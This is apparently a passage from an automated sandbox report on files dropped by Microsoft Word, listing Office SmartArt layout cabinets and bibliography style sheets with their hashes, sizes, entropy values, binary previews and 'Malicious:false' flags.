                                                      SHA-256:1CF5C2D0F6188FFFF117932C424CC55D1459E0852564C09D7779263ABD116118
                                                      SHA-512:ACE9718D724B51FE04B900CE1D2075C0C05C80243EA68D4731A63138F3A1287776E80BD67ECB14C323C69AA1796E9D8774A3611FE835BA3CA891270DE1E7FD1F
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF....].......D...........................]....?..........{.......................rings.glox.................Content.inf..|^.....[......P........<.$.."..0R..xa.Ax#B..d... ....K,.....^.H.....H.........&.j.\f.. ..,....,..!k..R..e..!...E...........................><.RB.....~h...........Q................g..M|,...x.....qV7.u..\...F-N.{-..X..&Zig.~..{.A.p.Z...X..{,-n............`$.%.ND.....>].6cvZ.%d..*a.$..-.K.Hf....L..;.#...H....U,........P.@.*-$C.,.g...%YJE..$.jP........b...Y<..[U...MF]F.K...1... x.}3w.o.#,.}T.....w5+...=.=...c.F^....OM.=.......G_{n.*...WC.w!......{/.~.}..s..6_......)..Xy...4.....<..XZJ........#~._i....%..fM.V.?.q...q.....7...B..sVt...(.:..c....~.e...kGZ...C..(J..o...`...?.)-.T.l....&...gR.$.....g.:...2.e%F.....x....z0...K..a8B...........D..]....7....~.".DR...r)...}b)e.>.\h~f...(}.c........Q...o5H.........C.KC.(.L.l................R..a.pg{..\.......-b........}.C......qTS..%..r.lG..Q.1..Z.>a.D...tC..LV...Rs.C.M18x.:......%O.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):22008
                                                      Entropy (8bit):7.662386258803613
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:ABBF10CEE9480E41D81277E9538F98CB
                                                      SHA1:F4EA53D180C95E78CC1DA88CD63F4C099BF0512C
                                                      SHA-256:557E0714D5536070131E7E7CDD18F0EF23FE6FB12381040812D022EC0FEE7957
                                                      SHA-512:9430DAACF3CA67A18813ECD842BE80155FD2DE0D55B7CD16560F4AAEFDA781C3E4B714D850D367259CAAB28A3BF841A5CB42140B19CFE04AC3C23C358CA87FFB
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF............D................................?..................................architecture.glox.................Content.inf..q5.^...[.....0y......../..CL.C5.Q..U5g.z....UUUMPC...C..P....T.....=..s..4c...-3H..E...2..2*..T...../.i.;$..............%...................'h.........#0.......[........c.h.....O...%.61...[.J..:.,^....W.]$..u...N.R.....H.......:%I.g5Kd.n6...W2.#.UL..h.8NN../.P...H.;@.N.F...v."h..K.....~.....8...{.+...&.#A.Q'..A.....[NJ.X.....|.|.G5...vp.h.p..1.....-...gECV.,o{6W.#L....4v..x..z..)[.......T.....BQ.pf..D.}...H....V..[._.'.......3..1....?m..ad..c(K.......N.N.6F%.m......9...4..]?...l6..).\p;w.s....@...I%H.....;\...R......f...3~:C...A..x....X...>...:~.+..r@..."......I..m.y..)F.l..9...6....m...=..Q.F.z..u......J].{WX...V.Z.b.A0B..!....~.;Z.....K.`c..,X.MFz....].Q.2.9..L."...]...6...JOU..6...~../......4A.|.......i.LKrY...2.R.o..X.\....0.%......>H.....8.z..^....5d|...4|...C......R28.E......a....e...J.S..Ng.]<&..mm
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):22340
                                                      Entropy (8bit):7.668619892503165
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:8B29FAB506FD65C21C9CD6FE6BBBC146
                                                      SHA1:CE1B8A57BB3C682F6A0AFC32955DAFD360720FDF
                                                      SHA-256:773AC516C9B9B28058128EC9BE099F817F3F90211AC70DC68077599929683D6F
                                                      SHA-512:AFA82CCBC0AEF9FAE4E728E4212E9C6EB2396D7330CCBE57F8979377D336B4DACF4F3BF835D04ABCEBCDB824B9A9147B4A7B5F12B8ADDADF42AB2C34A7450ADE
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF....4.......D...........................4....?..................1...............ThemePictureGrid.glox.....1...........Content.inf....K..5.[.... V.q......B.....?.h.i.J.D...Z...>.....i~...A...Z....H.hy.D..X.....>...L.I..`. z w0}.K`.C{h....W\../.U..p\%...B...;............9..8.^M.....].lP.p...|..?..M....E..S.`..-n........Q'.'.o..C}=..?`.bQ...J"0f.. ....k3n..F.Pu..#...w].`<...."D.].-.#+):..fe..=<.M...4..s.q.f._.=.*T.M..U.[R.kbw.,......t6_I...~.X..$_.q....}2..BR...).[...<.l.3........h%....2.$`>..hG...0.6.S......._3.d~1.c.2g....7tTO..F.D.f.Y..WCG.B..T....Gg&.U'....u.S/......&6w..[bc.4....R.e..f.,....l."........I....J.=~...$x.&2...+,-.;.v.'.AQ.fc...v._..rZ..TYR...g?..Z..!.3mP dj...../...+...q.....>..../...]P.z?DW&.p..GZ....R5n......,..]{].0m.9...o.{...e."...8VH....w"%;.g\.K..p.}....#r.u..l.vS...Y.7U.N*-E@.....~....E...x.....C.......{NP....5Ymk.*._.K...Z...f..;.......b.....,._@B..\.S..d.'\rs..].}.5"XJU.J..'.zk}.+P.)C.X.?9sx.D....(K....P^N_D...Z.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):31482
                                                      Entropy (8bit):7.808057272318224
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:F10DF902980F1D5BEEA96B2C668408A7
                                                      SHA1:92D341581B9E24284B7C29E5623F8028DBBAAFE9
                                                      SHA-256:E0100320A4F63E07C77138A89EA24A1CBD69784A89FE3BF83E35576114B4CE02
                                                      SHA-512:00A8FBCD17D791289AC8F12DC3C404B0AFD240278492DF74D2C5F37609B11D91A26D737BE95D3FE01CDBC25EEDC6DA0C2D63A2CCC4AB208D6E054014083365FB
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF.....;......L............................;...?...................;......................gosttitle.xsl.$...............Content.inf....v....[...=..Ic.32.E...`o.............m....4uk[.,.......{...}k{.R@(Hq..68nv...@.D.....$...j....8Q..........8.8........3...*.bi?Wt...:(..J.;&eii..io.w..z...`.'..i.MLR@.>....N..3`P.>$X@(r.#.D..(....P"_..I.$o.. L!y...I...H.........{.{....{.3....7..w..{w.2sn.dYn.lW...l...c$.UH....L6. .D$$...!F.!... .D............_..'.`.Q.v>..Z..f.n.l....0o.......bK...?s..eO....'.>t......S'..........~....h...v&7:q.x9|qs...%....:..D...ag.....e..'...".A.Y..?w"....p1t.9J.~.4.........~vj.n.8.;.O......../.}..io{p...e...\m.d`.gAm.......1"...N*...8..g"......~..[.e+.....\6i4.....%...Rq.U-p?..4P..4.f.?N.vI?.M\i.;.s..E.L.hu.*...\..5....N......]......\`...rS.\g.....2..!a).?.l.!i.^.t.u...x...g/.A..v.E...\.@.>kM...&.g.....%.......{.....2..E.g...'..[w...N.w..& 4M.a.cu.%:...\.D..Q..C.'fm..i....@._......QI.. ....h..|fB.il.(`..h.d;.l...`.s:
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):19893
                                                      Entropy (8bit):7.592090622603185
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:EF9CB8BDFBC08F03BEF519AD66BA642F
                                                      SHA1:D98C275E9402462BF52A4D28FAF57DF0D232AF6B
                                                      SHA-256:93A2F873ACF5BEAD4BC0D1CC17B5E89A928D63619F70A1918B29E5230ABEAD8E
                                                      SHA-512:4DFBDF389730370FA142DCFB6F7E1AC1C0540B5320FA55F94164C0693DB06C21E6D4A1316F0ABE51E51BCBDAB3FD33AE882D9E3CFDB4385AB4C3AF4C2536B0B3
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF............D................................?..................c...............TabbedArc.glox.....c...........Content.inf.;....Y.[.........B.....?.T..ZD...........^C...U.R<Z....z+.I.....Z..-.V...f.....lB..\P.....=.-p....w ...\.kD..x'v..T..A..............".8...d.........FD.ZL.h..T...bp.)9B.v..i..VX...&..\..7.s..qy...l........Rty.Y...rU..>.9...8....L..\.^x.kDU.|TJ..{kN.G..E..$.kvy?.. mv......P..4.....q.1.6<u....e..dD...4.1E..Xi.5.=....1.P.c.K~S...YMO:.?..cL.g.tq\.(b1....E..0A.i..C...BT.m.S......:...}.&U..#QL..O.O../..K......=..........0a..O............BYP......>f.......iu...7.K..;QO~.t....%N.s.]>~#../7YN.....C..9.=cY.......y..U5.....,.....u.....#_..SG.`NR*.....?*..d.R.k.rX$...&.... ..h.4T.D^k-xA...............Hz..ep)e..4..P."fo Ne...o.....0n.Exr.........H..v...A.."..%)2......5...".}j.o8...E.HRQ;}.. .._L.+.jz....{.U..}...=B.o.^..vZ.:5.Z.M....y{\(...N..9...EB*MG...!N.vy..^...nE..2..@.;.4..C..t.4....h..O.8.=.m./...|Lu.|mCU..b.^.n39.h[M...%D{..w.1
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):20235
                                                      Entropy (8bit):7.61176626859621
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:E3C64173B2F4AA7AB72E1396A9514BD8
                                                      SHA1:774E52F7E74B90E6A520359840B0CA54B3085D88
                                                      SHA-256:16C08547239E5B969041AB201EB55A3E30EAD400433E926257331CB945DFF094
                                                      SHA-512:7ED618578C6517ED967FB3521FD4DBED9CDFB7F7982B2B8437804786833207D246E4FCD7B85A669C305BE3B823832D2628105F01E2CF30B494172A17FC48576D
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF............D................................?..................................BracketList.glox.................Content.inf....7r...[.... G.q..@...B.....?X!.A.......!........X..Vk.JK...Z..=......PD.....P....5...jp..+..T....b.)np5.7.....Zz........... ..!.....S......1....`....h......T?.Nq../......z....[..:..5f;....O...d.FxD...4...Z....[..a...w..W.[..P...5.]...6..."...+t].!...2\%%`Q.\..)...=>.)......a.$.2.,...2,.Lw.?..+..qf....h....T/B.....}T.E...'.%.....,.......X....b..gt.hPYc|.....a...j...=...{..a.`!8!..|...L.T..k..!,.R.z/W....{..,...+..w.m..sQ..7<x..B....?....\.)..l...d...}.....v..W.C..'=p1c.Z=.W.g.e....&wm..N,..K.T../.oV../=9.}.....".28...r.Q....dzj{....S...1m...x9_...2PXpa...Q.n.$z...c..SGq...k......}kPE..*...3.|.5A.>..6.......+)qCB....q....qNkGe...W]..o..Z...J.<.i......qq.8....q..BE.(...._h.U.\@3.F...KdO..=1j+....).*Q.|B..Z..%......LDYk....j.....{klDW..#CVy}...X..O!..}..s..&..DC.....tL.j..b.......[...n.'..1..Xc...9Q..gM.....n..3...v.....~.).
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):22594
                                                      Entropy (8bit):7.674816892242868
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:EE0129C7CC1AC92BBC3D6CB0F653FCAE
                                                      SHA1:4ABAA858176B349BDAB826A7C5F9F00AC5499580
                                                      SHA-256:345AA5CA2496F975B7E33C182D5E57377F8B740F23E9A55F4B2B446723947B72
                                                      SHA-512:CDDABE701C8CBA5BD5D131ABB85F9241212967CE6924E34B9D78D6F43D76A8DE017E28302FF13CE800456AD6D1B5B8FFD8891A66E5BE0C1E74CF19DF9A7AD959
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF....2.......D...........................2....?..................0...............ThemePictureAccent.glox.....0...........Content.inf.o.@D..8.[.........B.....?. $...K.....~....aZ.WA"...k.......Z......."......"..X.fpB 2@d..87.[.A......p..e.'......F..P^%.%.RK...........T%0..........9..+8 ...&.q.....+.......^.fad^^n...d.....s1..... .3j.c-c7..y<.....6........C5n.KG...Rs[lt..ZkwI.!..Uj.ez_!A^: /.;.Rl4....^..<6..N...'.YY.n*.E{.`..s.7..z.......L.y.Y.....q.kx.....[5.+<to......1...L.r.m..kC.q.k.1..o.w8s.....xh.@.b.`l\...}z1.6..Y.</DY...Z5..D...0..4.;..XAA..0qD..E.....h...C..hH......S..Z.\.VBu......Rxs.+:RKzD......{......a..=......).<.....d.SM.......c!t.4.h..A=J~.>q?Hw.^.....?.....[..`....v.nl..A.u...S!...............c......b.J.I.....D...._?}..or.g.JZ#*."_``.>.....{...w......s...R.iXR..'z....S.z.\..f.....>7m..0q.c-8\..nZw.q..J.l....+..V....ZTs{.[yh..~..c........9;..D...V.s...#...JX~t8%......cP^...!.t......?..'.(.kT.T.y.I ...:..Y3..[Up.m...%.~
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):25314
                                                      Entropy (8bit):7.729848360340861
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:C47E3430AF813DF8B02E1CB4829DD94B
                                                      SHA1:35F1F1A18AA4FD2336A4EA9C6005DBE70013C7FC
                                                      SHA-256:F2DB1E60533F0D108D5FB1004904C1F2E8557D4493F3B251A1B3055F8F1507A3
                                                      SHA-512:6F8904E658EB7D04C6880F7CC3EC63FCFE31EF2C3A768F4ECF40B115314F23774DAEE66DCE9C55FAF0AD31075A3AC27C8967FD341C23C953CA28BDC120997287
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF.....#......D............................#...?...................#..............InterconnectedBlockProcess.glox......#..........Content.inf...<.:#.$[......O..........5f.P.5CU..6..jT..U..U..UM.T.........h................-... .......6...`.....G...........'.,DN:........... "..4..1u.....%.u..{{,....@lp..}..`.......Z...K.....Z..... Z4.<?..C.BF.....k.!Hl...]...Tvf..g....)...vny6.'..f....Z.R.`.......+....!..!.....:..4fj....."q..f..E..^!k.....M.c....R...B......g...~.........o.'.7,.e.,..7.R.e,(.+..+:....Q....f...P.H.I..U.....Jl...l...z.]7...C...<...L.,..@...i.{..e]K...2..KRW..7.-'.G.l!.n7..J.v.C...%/.....q...@..l..e..$..N..sg8]oo.(q(_.?.X.s...Ua..r0...Rz.o.eT.j...b*..}",n.qou..M.[.;%../c.x.4.z.2*.U.]..D...h...-R.$.=\3..P......N.mP......J...}BPn...g]d.5k..C.ee.ml...\.g...[.......<..6$.%.I#S9..I...6.i........_..P.n....c$.3..zw.hF......_{.+...o...[.&........&...M..m.....;....0....D7...4nQ.=/.._`._.nh.D.m..h.+....8..p..q.4.w.\...iy...*...lN6F..c.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):21111
                                                      Entropy (8bit):7.6297992466897675
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:D30AD26DBB6DECA4FDD294F48EDAD55D
                                                      SHA1:CA767A1B6AF72CF170C9E10438F61797E0F2E8CE
                                                      SHA-256:6B1633DD765A11E7ED26F8F9A4DD45023B3E4ADB903C934DF3917D07A3856BFF
                                                      SHA-512:7B519F5D82BA0DA3B2EFFAD3029C7CAB63905D534F3CF1F7EA3446C42FA2130665CA7569A105C18289D65FA955C5624009C1D571E8960D2B7C52E0D8B42BE457
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF....g.......D...........................g....?..........}.......................TabList.glox.................Content.inf....t....[......@..C...../.U5...........6...`.....T..>3.................=..09`..t......a..Y..BI.Z....=.'0...%...T..........H...>.:A.r......n..p...Pf.h...I.8... ....M.]&.#.vv'.....[c......g....>"......<c..f....i...sb!Z..iu<.%|......q.....G28.h-...7.....W.v...RtdK..F~.0.3.'.e..b7.c......a.3.....a\..]...gp8.+.u/}.w.qF........8.=.=|....\~..S.-q}]0...q.B.H.^J...!...a'.2Tn!..."..%........=.e_-.....{o..%o...a`.w..L.5..r.....e.8...pO..RE.Wgr..b.%.E...O.......8s...E....Um].C..M.....[...H.FZ..4...eZI.$..v.3<]..r....B..............8i......e<.D...Q4.q.^S.....H.b.......r.q..0o.......2..PP,."...JI...xU`.6f..K..Q9.Q..h..t....AI.S6...7............X..`dv..r..S....),7ES....#.....(...\.nh...X.ps%l..F...."<_....q....v........_.e.....P.........|&..fi..4..@..^0..v.]7.......^. ."..}(...w.g.X...=<....p.......L...P..XV....@:....N...Y....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):20457
                                                      Entropy (8bit):7.612540359660869
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:4EFA48EC307EAF2F9B346A073C67FCFB
                                                      SHA1:76A7E1234FF29A2B18C968F89082A14C9C851A43
                                                      SHA-256:3EE9AE1F8DAB4C498BD561D8FCC66D83E58F11B7BB4B2776DF99F4CDA4B850C2
                                                      SHA-512:2705644D501D85A821E96732776F61641FE82820FD6A39FFAF54A45AD126C886DC36C1398CDBDBB5FE282D9B09D27F9BFE7F26A646F926DA55DFF28E61FBD696
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF............D................................?..................................chevronaccent.glox.................Content.inf..O.$N...[.........B.....?.....$Zy..Zkr...y<.....Di-.aVX/....h..-.~........#.../.Fz....T...p....A..eHMe[..p...=................f..../%o......F@..=..$.B!....}.0..g..^vlI......f.W.F...Nm..2`...)...,.HL4.nsl.F.ir.k..e.!^.j2.v.iT....t...*..!h..Y...2Q..-.x.,.Xj.U.cj,....9.....)..W..n3f.......(cH.D.4M.!.+..4..3r..y......|r..@.PD.R..#...F..nJAR..1{-.....u3..$..L.b+h....:lZ.>....q.?. ~l..^.%.m....a...cG.h.?.|.?7.'....b.G.4..'..A...o.Z...//..?...d..*.....C..Z.....]Yv.g.]..... .........]x.#=.../.7;R.j....G.....zq=O`[.'5g.D.u..)..../../.v.JmCW.da....3.f..C.z%...S=....;A.q.|....z.E.aRu........ k..J"+.f.S.@.........eD4....\0..t./U..%.H..........M:..U.......J...Z..H.DG..u^..D..P....`.^b.........`c......#.....c.?...#..C.V.&.'..f.'...f.[..F.O..a...&..{TiXg4; .X."..0...B.#..^..........N"..w.@f...gd.S..K.....E....ZR...;.twR>.z.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):23597
                                                      Entropy (8bit):7.692965575678876
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:7C645EC505982FE529D0E5035B378FFC
                                                      SHA1:1488ED81B350938D68A47C7F0BCE8D91FB1673E2
                                                      SHA-256:298FD9DADF0ACEBB2AA058A09EEBFAE15E5D1C5A8982DEE6669C63FB6119A13D
                                                      SHA-512:9F410DA5DB24B0B72E7774B4CF4398EDF0D361B9A79FBE2736A1DDD770AFE280877F5B430E0D26147CCA0524A54EA8B41F88B771F3598C2744A7803237B314B2
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF............D................................?..................................pictureorgchart.glox.................Content.inf.W..y....[.............../.jC....U.CUUUTU.5...jjPU..MP....T..0*....o0.......Y.=....P.({.3.p..."pA!>r../3.q..7...........!...TO....(..%......6...3E?....~......CZmndse.Qy....p....h....=.:5...F..%.E.&.v.`I~. ..%._..b]..Y..Q..R.........nN.q8c..a..L..X/.M...PP.q..SpZ.K]>D"Pf..B.c....0..|I.Q.,.g/..Kev.../..=......w..}3.....(....+#T.....K`N.u..Z.....rriK.(...(...6.<R.%.]..NX..b..].C.u....++......Ia.x. .7....J.#............w>....7..R...H>....@%....~.yA.......~.UB..*. .P..$...-...v.....=M."....hw..b....{.....2pR....].C..u@=G."Y..;..gc/N.N.YB.Z.q.#....$....j.D.*.P..!.)S.{..c....&'E.lJ%.|O.a...FG.|.....A..h.=c7.)d.5...D...L...IQ..TTE.*NL-.*M..>..p0.`......m..,.w#rZ..wR\@.Wn..@Q...}..&...E...0K.NY....M.71..`.M./:.>..._L..m...,U.l....._fi...nj9..,..w.s.kJ.m.s.M.vmw.!.....B.s.%.-').h.....)c.l....F..`3r...-.....0..7..&N.....n.#H...<7
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):22149
                                                      Entropy (8bit):7.659898883631361
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:66C5199CF4FB18BD4F9F3F2CCB074007
                                                      SHA1:BA9D8765FFC938549CC19B69B3BF5E6522FB062E
                                                      SHA-256:4A7DC4ED098E580C8D623C51B57C0BC1D601C45F40B60F39BBA5F063377C3C1F
                                                      SHA-512:94C434A131CDE47CB64BCD2FB8AF442482F8ECFA63D958C832ECA935DEB10D360034EF497E2EBB720C72B4C1D7A1130A64811D362054E1D52A441B91C46034B0
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF....u.......D...........................u....?..................................HexagonRadial.glox.................Content.inf.........[.....`........./.mT.T6...CP..z5...0.PcUmCUSUCU.Q.P.0..f............^...H..2e.[..8...ld......*F.%.j.w!R..NA.L............ .r..z....$&.........P.=.r...O...e..dfv_.i%.C....^......?..x...+d..].B.3..EU...|Cc..z.`lQp..fr.....8!;.8.p.ZwH\.........~..T.t..]..H.]..S.2..Vt.....r.H../..-8........!:.Y&..|A..J.U...-.%..k..U...4m.. .q../..b.8.vc~......_q1.?..Bh.v.....L..I.$I..s.".u.. Y....I^5.v...3.......].^)b.t.j...=...Ze~.O...|.}T.._9c........L....BV.^......X..?.....{.>.j..5.m...d.7........g[..f.nST...i..t..|.T.jjS..4p.Pxu..*..W...|.A)..|9;....H.e.^.8D..S...M..Lj.|...M.m+..H.....8.&-....=.L.....n.v..M.9...l....=r......K.F.j.(.(xD.3..r'9.K..-...5..Z..x....._....a[...J...`.b_a\\j.ed..\.3.5....S.T...ms.....E...Xl.y.LH=...}..0.T...04.4..B[..H.....B{B9.h..=.8Mn.*.TL.c..y.s.?.c9$l...).h).6..;.X../_>Pl...O...U.R..v.dy$A
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):31835
                                                      Entropy (8bit):7.81952379746457
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:92A819D434A8AAEA2C65F0CC2F33BB3A
                                                      SHA1:85C3F1801EFFEA1EA10A8429B0875FC30893F2C8
                                                      SHA-256:5D13F9907AC381D19F0A7552FD6D9FC07C9BD42C0F9CE017FFF75587E1890375
                                                      SHA-512:01339E04130E08573DF7DBDFE25D82ED1D248B8D127BB90D536ECF4A26F5554E793E51E1A1800F61790738CC386121E443E942544246C60E47E25756F0C810A3
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF....K=......L...........................K=...?..................q<......................gb.xsl.................Content.inf.EF/.....[...A....3D.4..oVP!i/......t.6..l&9r0.8......c..q.^........$/..(./H ...^_Z0\4.42WU......P.F..9.._....'.D..<H@..E.b,K..9o..wo..v|..[.{7m.......|}aI..|g....IF2au?.1,..3.H.......ed....-.........m....$..8&0..w........2....s....z..d.Z.e.....@$r[..r..4...."E.Q@...Hh.B"b>...$.L.$.P.._..~.?./T..@..F..?.~G...MS..O%Z3*k..:..._...!GF..U...!..W..$..7...j......xy0..../.j..~4......8...YV....Fe.LU..J.B.k%BT5.X.q.w.a4....5..r...W.6.u...]i...t.....e.\.K............#t.c5.6....j...?#..{.m3.L9...E/....B[R.k(.'....S.'.}!j.tL..v....L....{<.m4......d_kD..D.....4`aC....rg..S..F.b..^........g;.`?,......\..T.\.H.8W.!V...1.T1.....|.Uh....T..yD'..R.......,.`h..~.....=......4..6E..x#XcVlc_S54 ..Q.4!V..P...{w..z.*..u.v....DC...W.(>4..a..h.t.F.Z...C.....&..%v...kt....n..2....+.@...EW.GE..%.:R`,}v.%.nx.P.#.f.......:.5(...]...n3{...v........Q..
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):21791
                                                      Entropy (8bit):7.65837691872985
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:7BF88B3CA20EB71ED453A3361908E010
                                                      SHA1:F75F86557051160507397F653D7768836E3B5655
                                                      SHA-256:E555A610A61DB4F45A29A7FB196A9726C25772594252AD534453E69F05345283
                                                      SHA-512:2C3DFB0F8913D1D8FF95A55E1A1FD58CE1F9D034268CD7BC0D2BF2DCEFEA8EF05DD62B9AFDE1F983CACADD0529538381632ADFE7195EAC19CE4143414C44DBE3
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF............D................................?..................................RadialPictureList.glox.................Content.inf....8....[.... $nq......C...../U..........a......S.Q...Q....j............(..z,.g.........^...Y..D... #i.TH5.<.=N..$..7.p".7.............`.3..1~,=,(.d8.Z.1....4'G.....!W^gClf._j.-N..&k.....Y3` =.(S..B^...i.zB.U....0O..h...I.(.......L...5.X.8.Sc<=>w.=.?&.....mR.......x.......mpW.T..^.FU...SN.C)......vsa.,x......,....E..i>..[g...#t...M..GR.9..$/4.:..q.bc9..x{bC.0..K.)..t.Y.&.v.d.16.B..c..or..W.,.B.........O.0..k.v........*F+..U.w...d...o8......A).}...#......L.!?.U.r.^.$...e.(..PG)8..+.9.5.l}.)..b.7+. 4....-.lC...|..j..Q.,.....7.W...|;j...%...:...|H..........<..%...K.....Fy.q$.k..}..8.9.M.u.?$].......r.....e.|..._..iT.;Dq5[....f.s..P.......e.T....!Y{.....t.wm..A..w-..7...3..T.:8.4.a[.Oo.. V.l.@.}..........E.&..J.....+..+.9)9<.._R.Hb.....V..Qu....:v.t.Li.0..J..V..b...!..N....-mD..c..(.[&o>.M.b..H.q..lk../..........W.8..z..B...
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):21875
                                                      Entropy (8bit):7.6559132103953305
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:E532038762503FFA1371DF03FA2E222D
                                                      SHA1:F343B559AE21DAEF06CBCD8B2B3695DE1B1A46F0
                                                      SHA-256:5C70DD1551EB8B9B13EFAFEEAF70F08B307E110CAEE75AD9908A6A42BBCCB07E
                                                      SHA-512:E0712B481F1991256A01C3D02ED56645F61AA46EB5DE47E5D64D5ECD20052CDA0EE7D38208B5EE982971CCA59F2717B7CAE4DFCF235B779215E7613AA5DCD976
                                                      Malicious:false
                                                      Reputation:unknown
